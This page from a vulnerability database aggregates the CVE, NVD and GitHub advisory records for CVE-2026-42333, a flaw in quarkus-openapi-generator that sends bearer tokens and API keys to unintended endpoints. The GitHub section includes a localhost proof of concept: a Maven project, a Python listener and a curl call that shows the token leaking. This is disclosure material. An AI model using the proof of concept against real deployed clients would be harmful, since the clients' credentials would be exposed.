Vulnerability-Lookup

CVE-2026-42333 (GCVE-0-2026-42333)

Vulnerability from cvelistv5 – Published: 2026-05-09 19:16 – Updated: 2026-05-09 19:16

Title

quarkus-openapi-generator has overly broad path-parameter matching that sends authentication headers to unintended operations

Summary

Quarkus OpenAPI Generator is Quarkus' extensions for generation of Rest Clients and server stubs generation. Prior to versions 2.11.1-lts, 2.16.0-lts, and 2.17.0, the generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints. This issue has been patched in versions 2.11.1-lts, 2.16.0-lts, and 2.17.0.

Severity ?

6.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

URL

Tags

	https://github.com/quarkiverse/quarkus-openapi-ge…	x_refsource_CONFIRM
	https://github.com/quarkiverse/quarkus-openapi-ge…	x_refsource_MISC
	https://github.com/quarkiverse/quarkus-openapi-ge…	x_refsource_MISC
	https://github.com/quarkiverse/quarkus-openapi-ge…	x_refsource_MISC
	https://github.com/quarkiverse/quarkus-openapi-ge…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	quarkiverse	quarkus-openapi-generator	Affected: < 2.11.1-lts Affected: < 2.16.0-lts Affected: < 2.17.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "quarkus-openapi-generator",
          "vendor": "quarkiverse",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.11.1-lts"
            },
            {
              "status": "affected",
              "version": "\u003c 2.16.0-lts"
            },
            {
              "status": "affected",
              "version": "\u003c 2.17.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Quarkus OpenAPI Generator is Quarkus\u0027 extensions for generation of Rest Clients and server stubs generation. Prior to versions 2.11.1-lts, 2.16.0-lts, and 2.17.0, the generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints. This issue has been patched in versions 2.11.1-lts, 2.16.0-lts, and 2.17.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-09T19:16:19.873Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v"
        },
        {
          "name": "https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586"
        },
        {
          "name": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts"
        },
        {
          "name": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts"
        },
        {
          "name": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0"
        }
      ],
      "source": {
        "advisory": "GHSA-fr8f-rwjx-f32v",
        "discovery": "UNKNOWN"
      },
      "title": "quarkus-openapi-generator has overly broad path-parameter matching that sends authentication headers to unintended operations"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42333",
    "datePublished": "2026-05-09T19:16:19.873Z",
    "dateReserved": "2026-04-26T13:26:14.514Z",
    "dateUpdated": "2026-05-09T19:16:19.873Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42333\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-09T20:16:28.780\",\"lastModified\":\"2026-05-09T20:16:28.780\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Quarkus OpenAPI Generator is Quarkus\u0027 extensions for generation of Rest Clients and server stubs generation. Prior to versions 2.11.1-lts, 2.16.0-lts, and 2.17.0, the generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints. This issue has been patched in versions 2.11.1-lts, 2.16.0-lts, and 2.17.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"references\":[{\"url\":\"https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-42333

Vulnerability from fkie_nvd - Published: 2026-05-09 20:16 - Updated: 2026-05-09 20:16

Severity ?

6.3 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586
	security-advisories@github.com	https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts
	security-advisories@github.com	https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts
	security-advisories@github.com	https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0
	security-advisories@github.com	https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Quarkus OpenAPI Generator is Quarkus\u0027 extensions for generation of Rest Clients and server stubs generation. Prior to versions 2.11.1-lts, 2.16.0-lts, and 2.17.0, the generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints. This issue has been patched in versions 2.11.1-lts, 2.16.0-lts, and 2.17.0."
    }
  ],
  "id": "CVE-2026-42333",
  "lastModified": "2026-05-09T20:16:28.780",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 6.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "LOW",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-09T20:16:28.780",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-FR8F-RWJX-F32V

Vulnerability from github – Published: 2026-05-04 21:15 – Updated: 2026-05-04 21:15

Summary

quarkus-openapi-generator has overly broad path-parameter matching that sends authentication headers to unintended operations

Details

Summary

The generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints.

Details

The runtime authentication layer selects credentials by comparing the outgoing request path and method against the set of protected OpenAPI operations. Path-template matching treats {param} placeholders as .*, which incorrectly allows a single path parameter to consume /.

As a result, a protected path such as /repos/{ref} also matches /repos/foo/bar, even though /repos/{owner}/{repo} is a different operation. When a client invokes the unprotected operation, the authentication filter still concludes that the protected operation matched and attaches its credentials.

This affects authentication providers that rely on the shared path-matching logic, including bearer, OAuth, API-key, and basic authentication. The issue is reachable through normal generated-client usage and does not require modifying generated code.

PoC

mkdir -p /tmp/qoag-poc/src/main/java/org/acme
mkdir -p /tmp/qoag-poc/src/main/resources
mkdir -p /tmp/qoag-poc/src/main/openapi

cat > /tmp/qoag-poc/pom.xml <<'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>org.acme</groupId>
  <artifactId>qoag-poc</artifactId>
  <version>1.0.0</version>

  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    <maven.compiler.release>17</maven.compiler.release>
    <quarkus.platform.group-id>io.quarkus</quarkus.platform.group-id>
    <quarkus.platform.artifact-id>quarkus-bom</quarkus.platform.artifact-id>
    <quarkus.platform.version>3.34.3</quarkus.platform.version>
    <qoag.version>2.16.0</qoag.version>
  </properties>

  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>${quarkus.platform.group-id}</groupId>
        <artifactId>${quarkus.platform.artifact-id}</artifactId>
        <version>${quarkus.platform.version}</version>
        <type>pom</type>
        <scope>import</scope>
      </dependency>
    </dependencies>
  </dependencyManagement>

  <dependencies>
    <dependency>
      <groupId>io.quarkiverse.openapi.generator</groupId>
      <artifactId>quarkus-openapi-generator</artifactId>
      <version>${qoag.version}</version>
    </dependency>
    <dependency>
      <groupId>io.quarkus</groupId>
      <artifactId>quarkus-rest</artifactId>
    </dependency>
    <dependency>
      <groupId>io.quarkus</groupId>
      <artifactId>quarkus-rest-client-jackson</artifactId>
    </dependency>
  </dependencies>

  <build>
    <plugins>
      <plugin>
        <groupId>io.quarkus</groupId>
        <artifactId>quarkus-maven-plugin</artifactId>
        <version>${quarkus.platform.version}</version>
        <extensions>true</extensions>
        <executions>
          <execution>
            <goals>
              <goal>build</goal>
              <goal>generate-code</goal>
              <goal>generate-code-tests</goal>
            </goals>
          </execution>
        </executions>
      </plugin>
      <plugin>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.14.0</version>
        <configuration>
          <parameters>true</parameters>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
EOF

cat > /tmp/qoag-poc/src/main/openapi/repro.yaml <<'EOF'
openapi: 3.0.3
info:
  title: repro
  version: 1.0.0

paths:
  /repos/{ref}:
    get:
      operationId: getRef
      parameters:
        - in: path
          name: ref
          required: true
          schema:
            type: string
      security:
        - bearerAuth: []
      responses:
        "200":
          description: ok
          content:
            text/plain:
              schema:
                type: string

  /repos/{owner}/{repo}:
    get:
      operationId: getOwnerRepo
      parameters:
        - in: path
          name: owner
          required: true
          schema:
            type: string
        - in: path
          name: repo
          required: true
          schema:
            type: string
      responses:
        "200":
          description: ok
          content:
            text/plain:
              schema:
                type: string

components:
  securitySchemes:
    bearerAuth:
      type: http
      scheme: bearer
EOF

cat > /tmp/qoag-poc/src/main/resources/application.properties <<'EOF'
quarkus.http.port=8081
quarkus.openapi-generator.codegen.default-security-scheme=bearerAuth
quarkus.openapi-generator.codegen.spec.repro_yaml.base-package=org.acme.repro
quarkus.rest-client.repro_yaml.url=http://127.0.0.1:18080
quarkus.openapi-generator.repro_yaml.auth.bearerAuth.bearer-token=SECRET
EOF

cat > /tmp/qoag-poc/src/main/java/org/acme/TriggerResource.java <<'EOF'
package org.acme;

import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
import org.eclipse.microprofile.rest.client.inject.RestClient;

@Path("/trigger")
public class TriggerResource {
    @RestClient
    org.acme.repro.api.DefaultApi api;

    @GET
    @Produces(MediaType.TEXT_PLAIN)
    public String trigger() {
        api.getOwnerRepo("foo", "bar");
        return "done";
    }
}
EOF

python - <<'PY' &
from http.server import BaseHTTPRequestHandler, HTTPServer
class H(BaseHTTPRequestHandler):
    def do_GET(self):
        print("PATH=" + self.path, flush=True)
        print("AUTH=" + str(self.headers.get("Authorization")), flush=True)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")
    def log_message(self, fmt, *args):
        pass
HTTPServer(("127.0.0.1", 18080), H).serve_forever()
PY

cd /tmp/qoag-poc
mvn -q package -DskipTests
java -jar target/quarkus-app/quarkus-run.jar &
sleep 8
curl -s http://127.0.0.1:8081/trigger

# PATH=/repos/foo/bar
# AUTH=Bearer SECRET

Impact

Clients generated from an OpenAPI specification can send authentication credentials to endpoints that were not intended to receive them. In practice, this can disclose bearer tokens, API keys, or basic credentials to lower-trust routes on the same service, cause public operations to be invoked with privileged credentials, and blur the intended security boundary between protected and unprotected operations.

Severity ?

6.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.quarkiverse.openapi.generator:quarkus-openapi-generator"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.16.0-lts"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.quarkiverse.openapi.generator:quarkus-openapi-generator"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.16.0"
            },
            {
              "fixed": "2.17.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.16.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42333"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:15:55Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints.\n\n### Details\n\nThe runtime authentication layer selects credentials by comparing the outgoing request path and method against the set of protected OpenAPI operations. Path-template matching treats `{param}` placeholders as `.*`, which incorrectly allows a single path parameter to consume `/`.\n\nAs a result, a protected path such as `/repos/{ref}` also matches `/repos/foo/bar`, even though `/repos/{owner}/{repo}` is a different operation. When a client invokes the unprotected operation, the authentication filter still concludes that the protected operation matched and attaches its credentials.\n\nThis affects authentication providers that rely on the shared path-matching logic, including bearer, OAuth, API-key, and basic authentication. The issue is reachable through normal generated-client usage and does not require modifying generated code.\n\n### PoC\n\n```bash\nmkdir -p /tmp/qoag-poc/src/main/java/org/acme\nmkdir -p /tmp/qoag-poc/src/main/resources\nmkdir -p /tmp/qoag-poc/src/main/openapi\n\ncat \u003e /tmp/qoag-poc/pom.xml \u003c\u003c\u0027EOF\u0027\n\u003cproject xmlns=\"http://maven.apache.org/POM/4.0.0\"\n         xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n         xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\"\u003e\n  \u003cmodelVersion\u003e4.0.0\u003c/modelVersion\u003e\n  \u003cgroupId\u003eorg.acme\u003c/groupId\u003e\n  \u003cartifactId\u003eqoag-poc\u003c/artifactId\u003e\n  \u003cversion\u003e1.0.0\u003c/version\u003e\n\n  \u003cproperties\u003e\n    \u003cproject.build.sourceEncoding\u003eUTF-8\u003c/project.build.sourceEncoding\u003e\n    \u003cmaven.compiler.release\u003e17\u003c/maven.compiler.release\u003e\n    \u003cquarkus.platform.group-id\u003eio.quarkus\u003c/quarkus.platform.group-id\u003e\n    \u003cquarkus.platform.artifact-id\u003equarkus-bom\u003c/quarkus.platform.artifact-id\u003e\n    \u003cquarkus.platform.version\u003e3.34.3\u003c/quarkus.platform.version\u003e\n    \u003cqoag.version\u003e2.16.0\u003c/qoag.version\u003e\n  \u003c/properties\u003e\n\n  \u003cdependencyManagement\u003e\n    \u003cdependencies\u003e\n      \u003cdependency\u003e\n        \u003cgroupId\u003e${quarkus.platform.group-id}\u003c/groupId\u003e\n        \u003cartifactId\u003e${quarkus.platform.artifact-id}\u003c/artifactId\u003e\n        \u003cversion\u003e${quarkus.platform.version}\u003c/version\u003e\n        \u003ctype\u003epom\u003c/type\u003e\n        \u003cscope\u003eimport\u003c/scope\u003e\n      \u003c/dependency\u003e\n    \u003c/dependencies\u003e\n  \u003c/dependencyManagement\u003e\n\n  \u003cdependencies\u003e\n    \u003cdependency\u003e\n      \u003cgroupId\u003eio.quarkiverse.openapi.generator\u003c/groupId\u003e\n      \u003cartifactId\u003equarkus-openapi-generator\u003c/artifactId\u003e\n      \u003cversion\u003e${qoag.version}\u003c/version\u003e\n    \u003c/dependency\u003e\n    \u003cdependency\u003e\n      \u003cgroupId\u003eio.quarkus\u003c/groupId\u003e\n      \u003cartifactId\u003equarkus-rest\u003c/artifactId\u003e\n    \u003c/dependency\u003e\n    \u003cdependency\u003e\n      \u003cgroupId\u003eio.quarkus\u003c/groupId\u003e\n      \u003cartifactId\u003equarkus-rest-client-jackson\u003c/artifactId\u003e\n    \u003c/dependency\u003e\n  \u003c/dependencies\u003e\n\n  \u003cbuild\u003e\n    \u003cplugins\u003e\n      \u003cplugin\u003e\n        \u003cgroupId\u003eio.quarkus\u003c/groupId\u003e\n        \u003cartifactId\u003equarkus-maven-plugin\u003c/artifactId\u003e\n        \u003cversion\u003e${quarkus.platform.version}\u003c/version\u003e\n        \u003cextensions\u003etrue\u003c/extensions\u003e\n        \u003cexecutions\u003e\n          \u003cexecution\u003e\n            \u003cgoals\u003e\n              \u003cgoal\u003ebuild\u003c/goal\u003e\n              \u003cgoal\u003egenerate-code\u003c/goal\u003e\n              \u003cgoal\u003egenerate-code-tests\u003c/goal\u003e\n            \u003c/goals\u003e\n          \u003c/execution\u003e\n        \u003c/executions\u003e\n      \u003c/plugin\u003e\n      \u003cplugin\u003e\n        \u003cartifactId\u003emaven-compiler-plugin\u003c/artifactId\u003e\n        \u003cversion\u003e3.14.0\u003c/version\u003e\n        \u003cconfiguration\u003e\n          \u003cparameters\u003etrue\u003c/parameters\u003e\n        \u003c/configuration\u003e\n      \u003c/plugin\u003e\n    \u003c/plugins\u003e\n  \u003c/build\u003e\n\u003c/project\u003e\nEOF\n\ncat \u003e /tmp/qoag-poc/src/main/openapi/repro.yaml \u003c\u003c\u0027EOF\u0027\nopenapi: 3.0.3\ninfo:\n  title: repro\n  version: 1.0.0\n\npaths:\n  /repos/{ref}:\n    get:\n      operationId: getRef\n      parameters:\n        - in: path\n          name: ref\n          required: true\n          schema:\n            type: string\n      security:\n        - bearerAuth: []\n      responses:\n        \"200\":\n          description: ok\n          content:\n            text/plain:\n              schema:\n                type: string\n\n  /repos/{owner}/{repo}:\n    get:\n      operationId: getOwnerRepo\n      parameters:\n        - in: path\n          name: owner\n          required: true\n          schema:\n            type: string\n        - in: path\n          name: repo\n          required: true\n          schema:\n            type: string\n      responses:\n        \"200\":\n          description: ok\n          content:\n            text/plain:\n              schema:\n                type: string\n\ncomponents:\n  securitySchemes:\n    bearerAuth:\n      type: http\n      scheme: bearer\nEOF\n\ncat \u003e /tmp/qoag-poc/src/main/resources/application.properties \u003c\u003c\u0027EOF\u0027\nquarkus.http.port=8081\nquarkus.openapi-generator.codegen.default-security-scheme=bearerAuth\nquarkus.openapi-generator.codegen.spec.repro_yaml.base-package=org.acme.repro\nquarkus.rest-client.repro_yaml.url=http://127.0.0.1:18080\nquarkus.openapi-generator.repro_yaml.auth.bearerAuth.bearer-token=SECRET\nEOF\n\ncat \u003e /tmp/qoag-poc/src/main/java/org/acme/TriggerResource.java \u003c\u003c\u0027EOF\u0027\npackage org.acme;\n\nimport jakarta.ws.rs.GET;\nimport jakarta.ws.rs.Path;\nimport jakarta.ws.rs.Produces;\nimport jakarta.ws.rs.core.MediaType;\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\n@Path(\"/trigger\")\npublic class TriggerResource {\n    @RestClient\n    org.acme.repro.api.DefaultApi api;\n\n    @GET\n    @Produces(MediaType.TEXT_PLAIN)\n    public String trigger() {\n        api.getOwnerRepo(\"foo\", \"bar\");\n        return \"done\";\n    }\n}\nEOF\n\npython - \u003c\u003c\u0027PY\u0027 \u0026\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nclass H(BaseHTTPRequestHandler):\n    def do_GET(self):\n        print(\"PATH=\" + self.path, flush=True)\n        print(\"AUTH=\" + str(self.headers.get(\"Authorization\")), flush=True)\n        self.send_response(200)\n        self.end_headers()\n        self.wfile.write(b\"ok\")\n    def log_message(self, fmt, *args):\n        pass\nHTTPServer((\"127.0.0.1\", 18080), H).serve_forever()\nPY\n\ncd /tmp/qoag-poc\nmvn -q package -DskipTests\njava -jar target/quarkus-app/quarkus-run.jar \u0026\nsleep 8\ncurl -s http://127.0.0.1:8081/trigger\n\n# PATH=/repos/foo/bar\n# AUTH=Bearer SECRET\n```\n\n### Impact\n\nClients generated from an OpenAPI specification can send authentication credentials to endpoints that were not intended to receive them. In practice, this can disclose bearer tokens, API keys, or basic credentials to lower-trust routes on the same service, cause public operations to be invoked with privileged credentials, and blur the intended security boundary between protected and unprotected operations.",
  "id": "GHSA-fr8f-rwjx-f32v",
  "modified": "2026-05-04T21:15:55Z",
  "published": "2026-05-04T21:15:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/quarkiverse/quarkus-openapi-generator"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "quarkus-openapi-generator has overly broad path-parameter matching that sends authentication headers to unintended operations"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42333 (GCVE-0-2026-42333)

FKIE_CVE-2026-42333

GHSA-FR8F-RWJX-F32V

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature